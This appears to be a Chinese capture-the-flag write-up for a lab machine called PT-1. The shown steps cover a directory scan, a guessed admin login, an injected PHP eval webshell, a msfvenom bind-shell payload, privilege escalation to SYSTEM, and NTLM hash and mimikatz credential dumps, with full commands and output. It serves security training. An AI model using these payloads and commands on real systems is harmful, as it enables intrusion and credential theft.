PT-1靶机
kali 打靶记录, 靶机启动然后下载靶场提供的 openvpn 对应的客户端文件, 命令连接:
openvpn --config cyberstrikelab.com-PT-1.ovpn
然后就挂着他, 重开终端进行后续操作
靶场主页面:
再页面最下方看到了该网站的 cms
目录扫描:
_|. _ _ _ _ _ _|_ v0.4.3
(_||| _) (/_(_|| (_| )
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460
Output File: D:\security\dirsearch-0.4.3\reports\http_10.0.0.68\__25-03-22_15-38-38.txt
Target: http://10.0.0.68/
[15:38:38] Starting:
[15:38:39] 403 - 215B - /%C0%AE%C0%AE%C0%AF
[15:38:39] 403 - 211B - /%3f/
[15:38:39] 301 - 228B - /js -> http://10.0.0.68/js/
[15:38:39] 403 - 210B - /%ff
[15:38:41] 403 - 220B - /.ht_wsr.txt
[15:38:41] 403 - 223B - /.htaccess.bak1
[15:38:41] 403 - 223B - /.htaccess.orig
[15:38:41] 403 - 225B - /.htaccess.sample
[15:38:41] 403 - 223B - /.htaccess.save
[15:38:41] 403 - 223B - /.htaccess_orig
[15:38:41] 403 - 224B - /.htaccess_extra
[15:38:41] 403 - 221B - /.htaccess_sc
[15:38:41] 403 - 221B - /.htaccessBAK
[15:38:41] 403 - 221B - /.htaccessOLD
[15:38:41] 403 - 222B - /.htaccessOLD2
[15:38:41] 403 - 214B - /.html
[15:38:41] 403 - 213B - /.htm
[15:38:41] 403 - 223B - /.htpasswd_test
[15:38:41] 403 - 219B - /.htpasswds
[15:38:41] 403 - 220B - /.httr-oauth
[15:38:55] 301 - 233B - /article -> http://10.0.0.68/article/
[15:38:55] 200 - 1KB - /article/
[15:38:59] 301 - 233B - /comment -> http://10.0.0.68/comment/
[15:39:01] 301 - 230B - /data -> http://10.0.0.68/data/
[15:39:01] 200 - 1KB - /data/
[15:39:01] 200 - 3B - /data/cache/
[15:39:01] 200 - 3B - /data/sessions/
[15:39:02] 301 - 232B - /detail -> http://10.0.0.68/detail/
[15:39:04] 200 - 1KB - /err.php
[15:39:05] 200 - 17KB - /favicon.ico
[15:39:08] 200 - 1KB - /i.php
[15:39:09] 301 - 233B - /include -> http://10.0.0.68/include/
[15:39:09] 200 - 2KB - /include/
[15:39:09] 403 - 225B - /index.php::$DATA
[15:39:09] 301 - 233B - /Install -> http://10.0.0.68/Install/
[15:39:09] 301 - 233B - /INSTALL -> http://10.0.0.68/INSTALL/
[15:39:09] 301 - 233B - /install -> http://10.0.0.68/install/
[15:39:10] 200 - 782B - /install/
[15:39:10] 200 - 590B - /js/
[15:39:12] 301 - 230B - /list -> http://10.0.0.68/list/
[15:39:12] 200 - 16KB - /login.php
[15:39:14] 200 - 5KB - /member.php
[15:39:16] 301 - 230B - /news -> http://10.0.0.68/news/
[15:39:19] 301 - 236B - /phpMyAdmin -> http://10.0.0.68/phpMyAdmin/
[15:39:19] 301 - 236B - /phpmyadmin -> http://10.0.0.68/phpmyadmin/
[15:39:20] 200 - 2KB - /phpmyadmin/README
[15:39:20] 200 - 32KB - /phpmyadmin/ChangeLog
[15:39:22] 200 - 4KB - /phpMyAdmin/
[15:39:22] 200 - 4KB - /phpMyadmin/
[15:39:22] 200 - 4KB - /phpMyAdmin/index.php
[15:39:22] 200 - 4KB - /phpmyadmin/index.php
[15:39:22] 200 - 4KB - /phpmyAdmin/
[15:39:22] 200 - 4KB - /phpmyadmin/
[15:39:24] 200 - 1KB - /s.php
[15:39:25] 200 - 1KB - /search.php
[15:39:31] 301 - 234B - /templets -> http://10.0.0.68/templets/
[15:39:32] 403 - 225B - /Trace.axd::$DATA
[15:39:32] 301 - 231B - /topic -> http://10.0.0.68/topic/
[15:39:33] 200 - 406B - /uploads/
[15:39:33] 301 - 233B - /uploads -> http://10.0.0.68/uploads/
[15:39:35] 301 - 231B - /video -> http://10.0.0.68/video/
[15:39:36] 403 - 226B - /web.config::$DATA
Task Completed
http://10.0.0.68/data/admin/ver.txt , 这个目录下的文件发现 cms 版本, 为 v12.9
然后寻找该 cms 的历史漏洞
访问 cms 后台:
猜测账号密码都是 cslab , 可以进入
在用户页面的会员消息通知这里插入一句话木马 1";@eval($_POST[cmd]);;//
这里 kali 不带蚁剑, 直接 github 下载对应的 linux 版本的蚁剑
蚁剑连接
c 盘发现 flag.txt
flag
go-flag{a3aecfd5-17db-52a0-ac1d-3a32124b04f4}
使用 msfvenom 正向连接
生成一个木马
msfvenom -p windows/x64/meterpreter/bind_tcp LHOST=0.0.0.0 LPORT=4444 -f exe > shell.exe
然后在蚁剑里面直接选择上传文件到指定的目录下
使用命令行运行该木马
msf 配置并连接
msfconsole
use exploit/multi/handler
set payload windows/x64/meterpreter/bind_tcp
set rhost 10.0.0.68
set lport 4444
run
提权
meterpreter > getsystem
...got system via technique 5 (Named Pipe Impersonation (PrintSpooler variant)).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
获取密码
meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:cad8ef0c410c9709cea512052756ce5a:::
ApacheUser:1000:aad3b435b51404eeaad3b435b51404ee:01ef84bcd8079831f0966ac49ae9c0e6:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
用 load kiwi 命令载入 minikatz , 然后 creds_all 获取全部信息
meterpreter > load kiwi
Loading extension kiwi...
.#####. mimikatz 2.2.0 20191125 (x64/windows)
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ## > http://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
'#####' > http://pingcastle.com / http://mysmartlogon.com ***/
Success.
meterpreter > creds_all
[+] Running as SYSTEM
[*] Retrieving all credentials
msv credentials
===============
Username Domain NTLM SHA1
-------- ------ ---- ----
Administrator WIN-S4KAS0ERCGQ cad8ef0c410c9709cea512052756ce5a 947e1029f3fc1ce2f1f6592a1e55844dd3152ea2
wdigest credentials
===================
Username Domain Password
-------- ------ --------
(null) (null) (null)
Administrator WIN-S4KAS0ERCGQ (null)
WIN-S4KAS0ERCGQ$ WORKGROUP (null)
kerberos credentials
====================
Username Domain Password
-------- ------ --------
(null) (null) (null)
Administrator WIN-S4KAS0ERCGQ (null)
win-s4kas0ercgq$ WORKGROUP (null)
flag2 题目要求是 ntmlhash 值:
cad8ef0c410c9709cea512052756ce5a
浙公网安备 33010602011771号